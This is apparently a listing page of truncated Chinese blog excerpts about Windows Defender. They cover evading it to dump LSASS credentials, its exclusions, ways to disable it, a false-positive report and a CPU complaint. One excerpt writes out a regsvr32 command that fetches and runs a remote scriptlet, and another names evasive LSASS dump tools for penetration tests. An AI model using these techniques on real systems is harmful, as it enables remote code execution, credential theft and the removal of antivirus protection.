0x00.前言 Windows Defender是一款内置在Windows操作系统的杀毒软件程序,本文旨在记录实战环境中,服务器存在Windows Defender情况下转储凭证的渗透手法,技术简单粗糙,但是有效,各位轻喷,抱拳.jpg 0x01.前提条件 能够落地Dump Lsass的免杀程序,这里推荐DumpMinitool/MalSeclogon(截至发文日期,依然有效) 具有BUILTIN\Administrators权限(当前用户(访问令牌)的组信息),通过whoami /all查看…

原文链接:blog 在对regsvr32的用法进行了解之后,对于Casey Smith的远程js脚本执行命令的思路很感兴趣. 命令语法如下: regsvr32 /s /n /u /i:http://127.0.0.1/file.sct scrobj.dll 原理则是利用com组件的scriptlet注册方式,关于scriptlet的介绍可以参考MSDN,差不多就是用脚本形式实现com组件和asp互操作,但其实除了给asp调用之外还可以给其他.net组件调用. 命令中的参数介绍: /s: 静默模式…

  之前看到一篇关于Lsass内存dump的文章,学习记录一下.   lsass.exe(Local Security Authority Subsystem Service)进程空间中,存有着机器的域.本地用户名和密码等重要信息.如果获取本地高权限,用户便可以访问 LSASS 进程内存,从而可以导出内部数据(password),用于横向移动和权限提升.   Windows环境中,一款知名的开源工具Mimikatz(开发者为Benjamin Delpy)可以从 LSASS 内存数据中提取用户名和…

Windows Server 2016 的计算机上的 Windows Defender 防病毒自动注册你在某些排除项,由你指定的服务器角色定义. 这些排除项不会显示在Windows 安全中心应用中所示的标准排除项列表. 自定义排除项优先于自动排除项.(*提示:自定义和重复的排除与自动排除不冲突.*) Windows Defender 防病毒使用部署映像服务和管理 (DISM) 工具来确定你的计算机上已安装的角色. 从自动排除项中选择退出 在 Windows Server 2016 中,定义更新生…

针对Win8及以上系统: 按Win+R键,输入services.msc,下滑找到以W开头的Windows Defender相关项,右键在属性中设为自动并开启. (若1无法解决)按Win+R键,输入regedit,找到Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender,将其中DisableAntiSpyware或DisableAntiVirus的值从1改为0,或直接将该项删除,然后重启电脑即可.…

1.按下Win+R,输入gpedit.msc 2.进入组策略,选择计算机配置>管理模板>Windows 组件>Windows Defender 3.双击"关闭 Windows Defender",选择"已启用",点击确定 4.进入"实时保护"  ,双击"关闭实时保护",选择"已启用",点击确定 5.右击任务栏上Defender图标,选择"打开",会弹出对话框,点击关闭,…

导读 Windows 10 至发布以来就内置集成了 Windows Defender 安全防护应用,但有许多用户平常压根儿就没注意到它的存在.微软为了使安全防护功能更加明显,Windows 10 周年更新中将 Windows Defender 图标列到了任务栏通知区域,以方便用户使用. 禁用任务栏图标并不会影响到 Windows Defender 的正常工作,它仍会在后台对系统进行安全防护,你可以正常通过「设置」—「更新和安全」—「Windows Defender」或在「开始」菜单中搜索 Win…

从官网上下载的fdm lite 3.9.6,从图片中可以看出安装包有数字签名,windows defender报毒,在线杀毒也检出木马,官网的程序更新到了3.9.6版本,在sourceforge上的源码还是3.8.1173,从官网上看,3.9.6版本的更新日期是2015年06月25日,但是从sourceforge上并没有找到这个版本的源码(或许只是我没找到). 以下截图证明:…

我是一个喜欢裸奔的人,我不喜欢使用那些安全软件,什么360啊,什么毒霸啊让我深恶痛绝,就连windows自带的杀软我都不能忍啊,因为我平时喜欢找一下软件,很多的补丁和注册机,这些安全软件都会误报,所以我一般都是裸奔,不确定某些软件是否有害的时候我用沙盘就可以了,回到正题,怎么关闭微软自带的这个windows defender呢,一般的做法是去控制面板中取消勾选下面的这一项…

今天从早上开始,Windows Defender Service服务从CPU消耗资源30%一直上升到60%并且无法下降. 我一直使用的是Windows 10 Enterprise 2016长期服务支持版,并且Windows Defender 从安装系统就一直关闭了. 组策略,注册表的相关方法都用过了,无法降低或关闭该服务: 安装其它杀毒软件重启系统后此服务依然高负荷,鉴于自身水品有限, 在此求助.相信我不是唯一碰到这种情况的,系统重启了多次,一点帮助也没有. 一款系统做到这份上我也不想说什么了,…